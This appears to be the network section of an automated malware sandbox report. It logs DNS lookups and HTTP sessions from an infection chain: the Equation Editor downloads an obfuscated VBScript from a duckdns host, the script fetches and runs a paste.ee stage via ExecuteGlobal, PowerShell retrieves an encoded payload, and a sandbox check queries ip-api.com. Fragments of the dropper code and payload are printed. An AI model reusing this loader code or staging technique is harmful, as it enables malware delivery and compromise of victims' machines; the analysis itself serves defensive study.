                                                                            Oct 24, 2024 08:52:46.334208012 CEST53545628.8.8.8192.168.2.22
                                                                            Oct 24, 2024 08:52:46.419667959 CEST5291753192.168.2.228.8.8.8
                                                                            Oct 24, 2024 08:52:46.431705952 CEST53529178.8.8.8192.168.2.22
                                                                            Oct 24, 2024 08:52:46.462253094 CEST6275153192.168.2.228.8.8.8
                                                                            Oct 24, 2024 08:52:46.472408056 CEST53627518.8.8.8192.168.2.22
                                                                            Oct 24, 2024 08:52:50.585891008 CEST5789353192.168.2.228.8.8.8
                                                                            Oct 24, 2024 08:52:50.593947887 CEST53578938.8.8.8192.168.2.22
                                                                            Oct 24, 2024 08:52:52.043365955 CEST5482153192.168.2.228.8.8.8
                                                                            Oct 24, 2024 08:52:52.060544014 CEST53548218.8.8.8192.168.2.22
                                                                            Oct 24, 2024 08:53:07.914249897 CEST5471953192.168.2.228.8.8.8
                                                                            Oct 24, 2024 08:53:07.922295094 CEST53547198.8.8.8192.168.2.22
                                                                            Oct 24, 2024 08:53:10.062776089 CEST4988153192.168.2.228.8.8.8
                                                                            Oct 24, 2024 08:53:10.073369026 CEST53498818.8.8.8192.168.2.22
                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                            Oct 24, 2024 08:52:46.334311008 CEST192.168.2.228.8.8.8d024(Port unreachable)Destination Unreachable
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 24, 2024 08:52:44.235963106 CEST192.168.2.228.8.8.80xe7c3Standard query (0)wednesdayyyyyyfile.duckdns.orgA (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:45.235843897 CEST192.168.2.228.8.8.80xe7c3Standard query (0)wednesdayyyyyyfile.duckdns.orgA (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:46.419667959 CEST192.168.2.228.8.8.80x526fStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:46.462253094 CEST192.168.2.228.8.8.80x7d11Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:50.585891008 CEST192.168.2.228.8.8.80x4690Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:52.043365955 CEST192.168.2.228.8.8.80x481fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:53:07.914249897 CEST192.168.2.228.8.8.80x9f74Standard query (0)wednesdayyyyyyfile.duckdns.orgA (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:53:10.062776089 CEST192.168.2.228.8.8.80x6e9bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 24, 2024 08:52:45.334414959 CEST8.8.8.8192.168.2.220xe7c3No error (0)wednesdayyyyyyfile.duckdns.org198.46.178.134A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:46.334208012 CEST8.8.8.8192.168.2.220xe7c3No error (0)wednesdayyyyyyfile.duckdns.org198.46.178.134A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:46.431705952 CEST8.8.8.8192.168.2.220x526fNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:46.431705952 CEST8.8.8.8192.168.2.220x526fNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:46.472408056 CEST8.8.8.8192.168.2.220x7d11No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:46.472408056 CEST8.8.8.8192.168.2.220x7d11No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:50.593947887 CEST8.8.8.8192.168.2.220x4690No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:52:52.060544014 CEST8.8.8.8192.168.2.220x481fNo error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:53:07.922295094 CEST8.8.8.8192.168.2.220x9f74No error (0)wednesdayyyyyyfile.duckdns.org198.46.178.134A (IP address)IN (0x0001)false
                                                                            Oct 24, 2024 08:53:10.073369026 CEST8.8.8.8192.168.2.220x6e9bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                            • paste.ee
                                                                            • drive.google.com
                                                                            • drive.usercontent.google.com
                                                                            • wednesdayyyyyyfile.duckdns.org
                                                                            • ip-api.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.2249163198.46.178.134803492C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 24, 2024 08:52:45.354321957 CEST347OUTGET /wednesdaysMPDW-constraints.vbs HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: wednesdayyyyyyfile.duckdns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 24, 2024 08:52:46.016316891 CEST1236INHTTP/1.1 200 OK
                                                                            Content-Type: text/vbscript
                                                                            Last-Modified: Wed, 23 Oct 2024 17:10:40 GMT
                                                                            Accept-Ranges: bytes
                                                                            ETag: "43a1e17c6e25db1:0"
                                                                            Server: Microsoft-IIS/10.0
                                                                            Date: Thu, 24 Oct 2024 06:52:45 GMT
                                                                            Content-Length: 2256
                                                                            Data Raw: ff fe 0d 00 0a 00 53 00 65 00 74 00 20 00 65 00 73 00 74 00 61 00 74 00 75 00 61 00 72 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 4d 00 53 00 58 00 4d 00 4c 00 32 00 2e 00 53 00 65 00 72 00 76 00 65 00 72 00 58 00 4d 00 4c 00 48 00 54 00 54 00 50 00 2e 00 36 00 2e 00 30 00 22 00 29 00 0d 00 0a 00 0d 00 0a 00 6d 00 61 00 72 00 65 00 74 00 69 00 6e 00 61 00 20 00 3d 00 20 00 61 00 6d 00 79 00 67 00 64 00 6f 00 70 00 68 00 69 00 6e 00 69 00 6e 00 61 00 28 00 22 00 67 2a 20 00 f5 02 20 00 e5 27 20 00 c0 23 20 00 5b 2f 22 00 29 00 0d 00 0a 00 63 00 61 00 74 00 6f 00 74 00 6f 00 6c 00 20 00 3d 00 20 00 61 00 6d 00 79 00 67 00 64 00 6f 00 70 00 68 00 69 00 6e 00 69 00 6e 00 61 00 28 00 22 00 64 00 67 2a 20 00 f5 02 20 00 e5 27 20 00 c0 23 20 00 5b 2f 6b 00 67 2a 20 00 f5 02 20 00 e5 27 20 00 c0 23 20 00 5b 2f 74 00 67 2a 20 00 f5 02 20 00 e5 27 20 00 c0 23 20 00 5b 2f 77 00 67 2a 20 00 f5 02 20 00 e5 27 20 00 c0 23 20 00 5b 2f 6e 00 67 2a 20 00 [TRUNCATED]
                                                                            Data Ascii: Set estatuar = CreateObject("MSXML2.ServerXMLHTTP.6.0")maretina = amygdophinina("g* ' # [/")catotol = amygdophinina("dg* ' # [/kg* ' # [/tg* ' # [/wg* ' # [/ng* ' # [//g* ' # [/dg* ' # [//g* ' # [/eg* ' # [/eg* ' # [/.g* ' # [/eg* ' # [/tg* ' # [/sg* ' # [/ag* ' # [/pg* ' # [//g* ' # [//g* ' # [/:g* ' # [/pg* ' # [/tg* ' # [/tg* ' # [/h")catotol = ReplaceString(catotol, maretina, "")estatuar.Open "GET", catotol, Falseestatuar.SendExecuteGlobal estatuar.ResponseTextFunctio
                                                                            Oct 24, 2024 08:52:46.016347885 CEST1236INData Raw: 6e 00 20 00 52 00 65 00 70 00 6c 00 61 00 63 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 28 00 62 00 69 00 73 00 73 00 65 00 78 00 75 00 61 00 6c 00 6d 00 65 00 6e 00 74 00 65 00 2c 00 20 00 6d 00 6f 00 6e 00 61 00 7a 00 69 00 74 00 65 00 2c 00
                                                                            Data Ascii: n ReplaceString(bissexualmente, monazite, vender) Dim ressuar ressuar = InStr(bissexualmente, monazite)
                                                                            Oct 24, 2024 08:52:46.016366005 CEST14INData Raw: 63 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00
                                                                            Data Ascii: ction


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.2249164188.114.96.3803640C:\Windows\SysWOW64\wscript.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 24, 2024 08:52:46.478975058 CEST173OUTGET /d/nwtkd HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Language: en-us
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: paste.ee
                                                                            Oct 24, 2024 08:52:47.163486004 CEST788INHTTP/1.1 301 Moved Permanently
                                                                            Date: Thu, 24 Oct 2024 06:52:47 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            Location: https://paste.ee/d/nwtkd
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8ZdG%2FTxlbtxVnlhQAyedhri6480jTxFVmCTUIczcocULBfRBpWaPWVdTizfdeYfbWPqRr0BOjZM6twUwv1tNVaBK%2BZCgdtgSUdRL%2F%2BPUoAr09OStwJEEPgMpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d780bc9df09e7d7-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Oct 24, 2024 08:52:47.163535118 CEST182INData Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30
                                                                            Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.2249168198.46.178.134803808C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 24, 2024 08:53:07.928142071 CEST108OUTGET /equitosssssssdroidlatest.txt HTTP/1.1
                                                                            Host: wednesdayyyyyyfile.duckdns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 24, 2024 08:53:08.611896038 CEST1236INHTTP/1.1 200 OK
                                                                            Content-Type: text/plain
                                                                            Last-Modified: Wed, 23 Oct 2024 16:41:08 GMT
                                                                            Accept-Ranges: bytes
                                                                            ETag: "8b4d445c6a25db1:0"
                                                                            Server: Microsoft-IIS/10.0
                                                                            Date: Thu, 24 Oct 2024 06:53:08 GMT
                                                                            Content-Length: 327680
                                                                            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIDMAAAAMAwAQDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwj
                                                                            Oct 24, 2024 08:53:08.611943960 CEST1236INData Raw: 43 4e 34 7a 62 6d 35 57 53 30 4e 58 64 79 52 33 4c 38 41 43 49 4b 30 67 50 35 52 58 61 79 56 33 59 6c 4e 33 4c 38 41 43 49 67 41 69 43 4e 34 7a 63 6c 64 57 5a 73 6c 6d 64 70 4a 48 55 6b 56 47 64 7a 56 57 64 78 56 6d 63 76 77 44 49 67 41 43 49 67
                                                                            Data Ascii: CN4zbm5WS0NXdyR3L8ACIK0gP5RXayV3YlN3L8ACIgAiCN4zcldWZslmdpJHUkVGdzVWdxVmcvwDIgACIgAiCN4zLiU2csFmZi0zczV2YjFUa1BiIyV2avZnbJNXYi0DblZXZsBCblZXZM52bpRXdjVGeFRWZ0NXZ1FXZyxDIgACIgACIgoQD+IyM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIzV2Zlx
                                                                            Oct 24, 2024 08:53:08.611958027 CEST1236INData Raw: 41 42 42 41 49 41 34 43 41 75 42 77 62 41 6b 47 41 30 42 51 59 41 51 47 41 75 42 51 64 41 38 47 41 47 42 41 49 41 55 47 41 79 42 51 59 41 63 48 41 30 42 67 5a 41 38 47 41 54 42 41 49 41 34 47 41 76 42 41 61 41 51 48 41 35 42 41 55 41 41 43 41 70
                                                                            Data Ascii: ABBAIA4CAuBwbAkGA0BQYAQGAuBQdA8GAGBAIAUGAyBQYAcHA0BgZA8GATBAIA4GAvBAaAQHA5BAUAACApAwYAgCAgAAdAgGAnBQaAIHA5BAcA8GADBAAAQHAoBwZAkGAyBQeAAHAvBwQAwGAhBwZAUGAMBQAA8DAkCAAAAAAlBAeAUGAuAgZAkDAyAAMAADA5AQYAQDAhBQMAQDAkBQLAIGAjBQYAkDAtAQZAUDA5AANA0CAzA
                                                                            Oct 24, 2024 08:53:08.611975908 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                            Oct 24, 2024 08:53:08.611989975 CEST848INData Raw: 41 48 67 41 43 49 55 51 48 42 4d 41 49 48 67 51 55 53 55 51 48 74 4d 6f 45 45 63 67 43 56 4d 6f 45 42 43 6f 45 52 4a 52 41 44 41 79 43 46 4d 59 45 70 4d 59 45 70 4d 59 45 42 4d 41 49 4d 55 79 67 53 6b 78 67 53 45 41 41 49 45 78 67 53 59 41 42 49
                                                                            Data Ascii: AHgACIUQHBMAIHgQUSUQHtMoEEcgCVMoEBCoERJRADAyCFMYEpMYEpMYEBMAIMUygSkxgSEAAIExgSYABIgQACASBdMYEAASBhMoEAAQBKExgSEgAgcQDDKRHAAiBFCoEAAQBI0xgR0xgR0xgR0xgRkhEZIRGDKRFDKRgAKREDKRDDKRCDKRBDGhDHgCCI0hEF0BBHgAHCEAAEgQYBKhDJLoEOkvgSYwBO4QADKRAgYQ/CKBAgU
                                                                            Oct 24, 2024 08:53:08.612004995 CEST1236INData Raw: 43 49 67 51 42 64 67 51 42 64 34 67 44 4f 49 51 58 53 55 68 4b 48 6b 31 41 47 49 41 43 64 47 6f 45 42 49 41 49 48 67 77 41 64 6b 70 67 53 6b 71 67 53 55 51 48 46 30 52 42 64 55 51 48 46 30 68 44 4b 63 67 46 49 51 62 67 52 49 77 42 47 67 51 42 64
                                                                            Data Ascii: CIgQBdgQBd4gDOIQXSUhKHk1AGIACdGoEBIAIHgwAdkpgSkqgSUQHF0RBdUQHF0hDKcgFIQbgRIwBGgQBdUQHF0R5BKRBdUQHtIoEIcwEDUQAAQACF0RBdUQHF0RqCKBCIUQHF0RBdkpgSUQHlKoEOcgHNgQAAQACF0RBdUQHF0RBdUQHF0RBdgACIgQBdgACIggDhERBdggFHMCCF0RCCAgBIAUgSAUgS4gDF0BCOgACIggDIk
                                                                            Oct 24, 2024 08:53:08.612016916 CEST212INData Raw: 65 42 4b 42 57 42 4b 52 42 64 34 67 44 41 46 6f 45 42 30 6b 45 56 63 78 42 76 67 51 78 42 4b 52 41 67 59 41 43 49 34 51 48 41 46 6f 45 4f 34 51 42 64 55 51 48 41 47 6f 45 4f 55 51 48 46 30 42 67 42 4b 68 44 4f 34 41 43 34 46 6f 45 39 48 6f 45 56
                                                                            Data Ascii: eBKBWBKRBd4gDAFoEB0kEVcxBvgQxBKRAgYACI4QHAFoEO4QBdUQHAGoEOUQHF0BgBKhDO4AC4FoE9HoEVGoEOUQHOAUgSEQTSUBGHIDC5JRECKRxBKhDB0kEVUwBQ4gDCEWEVYgDOIQYRURA5DYEVsgDOIQYRURANJRFKggDOIQYRURA5DYEVUQHAGoEAGoEF0RBdAYgSgXgS4gDCEW
                                                                            Oct 24, 2024 08:53:08.612034082 CEST1236INData Raw: 45 56 51 56 67 53 55 51 48 4f 55 51 48 46 30 52 42 64 55 51 48 46 30 52 42 64 55 51 48 41 47 6f 45 46 30 42 57 42 4b 68 44 41 47 6f 45 34 46 6f 45 46 30 52 42 64 67 56 67 53 55 51 48 65 63 67 55 49 55 51 48 51 47 6f 45 46 30 52 66 43 4b 52 42 64
                                                                            Data Ascii: EVQVgSUQHOUQHF0RBdUQHF0RBdUQHAGoEF0BWBKhDAGoE4FoEF0RBdgVgSUQHecgUIUQHQGoEF0RfCKRBdUQHHcQEIUQHF0RBdUQHF0RBdUQHIUQHF0RBdwwBYgACO0hDB0kEV4gDB0kEVYwBRgQBd4gDF0RBdwYgSUQHF0RCHIhD9HoEBAiB5JYEOEgAgcAC5JRECKRBdUQHFHoE9HoEF0hDJcQFIggDdAUgSUQHI4gDOgVgS4
                                                                            Oct 24, 2024 08:53:08.612047911 CEST1236INData Raw: 45 42 30 6b 45 56 41 55 67 53 34 67 44 4f 34 41 43 51 47 6f 45 59 46 6f 45 46 30 52 42 64 41 55 67 53 45 51 54 53 55 68 44 4f 63 41 4a 49 55 51 48 49 49 41 41 47 45 6c 45 42 45 41 49 46 30 6c 67 52 6b 65 67 53 45 6c 45 42 4d 41 49 4c 67 51 72 42
                                                                            Data Ascii: EB0kEVAUgS4gDO4ACQGoEYFoEF0RBdAUgSEQTSUhDOcAJIUQHIIAAGElEBEAIF0lgRkegSElEBMAILgQrBKRWCKR6BKRGSUfgS4Q5BKBCHUBCAFoEB0kEVAUgS4gDO4gDOgAWBKhDOAUgSEQTSUhDHACCF0hBCAgBIUQHBAQBI4ACIUQHF0hBHoACO4gAZHYEV4gDC0lEV4gAZHYEV4AQBKhDQFoEOAUgSEQTSURCHYCCdGoEdG
                                                                            Oct 24, 2024 08:53:08.612062931 CEST1236INData Raw: 44 64 41 55 67 53 34 67 44 64 34 67 44 64 34 67 44 64 34 67 44 4f 41 55 67 53 45 51 54 53 55 68 44 54 63 41 4a 44 30 52 41 42 41 53 42 44 67 51 41 67 51 41 43 49 67 41 43 44 30 42 43 49 63 77 42 4b 77 42 48 63 34 77 41 41 59 41 48 64 34 51 41 41
                                                                            Data Ascii: DdAUgS4gDd4gDd4gDd4gDOAUgSEQTSUhDTcAJD0RABASBDgQAgQACIgACD0BCIcwBKwBHc4wAAYAHd4QAAUACc0BHdggDdggDd4QHO0hDI4gDd4QHOEQTSUxDH0BAeEQgBKRFA4RHBEAENggDOIQXSUhDCkdgRUhDBkPgRUBQBKRANJRFAFoEOAVgS4QHO4QANJRFAFoEB0kEVswByUigR4ACCAyBA4RABGoEVAgHB0kEVEQAQA
                                                                            Oct 24, 2024 08:53:08.619548082 CEST1236INData Raw: 67 53 34 67 41 5a 48 59 45 56 6b 41 51 42 4b 68 44 43 55 64 67 53 55 52 43 4f 34 67 41 64 4a 52 46 47 34 67 44 43 30 6c 45 56 34 67 41 5a 48 59 45 56 77 51 41 54 41 77 45 43 6b 64 67 52 55 42 41 67 73 67 44 4f 49 51 58 53 55 68 44 43 55 64 67 53
                                                                            Data Ascii: gS4gAZHYEVkAQBKhDCUdgSURCO4gAdJRFG4gDC0lEV4gAZHYEVwQATAwECkdgRUBAgsgDOIQXSUhDCUdgSUBDBMBATIQ1BKRFAAyCAFoEOIQXSUBCIAUgS4gAhHYEVMQHAFoEOIQ2BGRFO4gAdJRFOIQ2BGRFAFoEAFoEF0hDOggDdAUgSAUgS4gDOAUgS4gAdJRFQFoEO4gDO4AQBKRANJRFZcAUI0cgSEAIGkcgSAAIF4QxBK


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.2249169208.95.112.1803940C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 24, 2024 08:53:10.095597982 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                            Host: ip-api.com
                                                                            Connection: Keep-Alive
                                                                            Oct 24, 2024 08:53:10.690785885 CEST174INHTTP/1.1 200 OK
                                                                            Date: Thu, 24 Oct 2024 06:53:10 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 5
                                                                            Access-Control-Allow-Origin: *
                                                                            X-Ttl: 60
                                                                            X-Rl: 44
                                                                            Data Raw: 74 72 75 65 0a
                                                                            Data Ascii: true
                                                                            Oct 24, 2024 08:53:10.900126934 CEST174INHTTP/1.1 200 OK
                                                                            Date: Thu, 24 Oct 2024 06:53:10 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 5
                                                                            Access-Control-Allow-Origin: *
                                                                            X-Ttl: 60
                                                                            X-Rl: 44
                                                                            Data Raw: 74 72 75 65 0a
                                                                            Data Ascii: true


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.2249165188.114.96.34433640C:\Windows\SysWOW64\wscript.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-24 06:52:47 UTC173OUTGET /d/nwtkd HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Language: en-us
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: paste.ee
                                                                            2024-10-24 06:52:48 UTC1234INHTTP/1.1 200 OK
                                                                            Date: Thu, 24 Oct 2024 06:52:48 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Cache-Control: max-age=2592000
                                                                            strict-transport-security: max-age=63072000
                                                                            x-frame-options: DENY
                                                                            x-content-type-options: nosniff
                                                                            x-xss-protection: 1; mode=block
                                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2ByA0ifcnpqnfTjOMqO9wJ76IuUDdLeWRveC9jIPH6u3rEHMaz%2BFDGR2qCEZQp8w5JgE1EJCAswYYNUIa3ni708bP0nQnd8jybHeyJHDkU5Xime%2BkIeA%2FyOwBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d780bcfde712c8f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-24 06:52:48 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 32 36 31 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 32 35 32 30 35 33 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 66 30 63 33 34 34 30 66 65 66 37 37 64 36 32 63 26 74 73 3d 34 32 37 26 78 3d 30 22 0d 0a 0d 0a
                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2261&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=787&delivery_rate=1252053&cwnd=251&unsent_bytes=0&cid=f0c3440fef77d62c&ts=427&x=0"
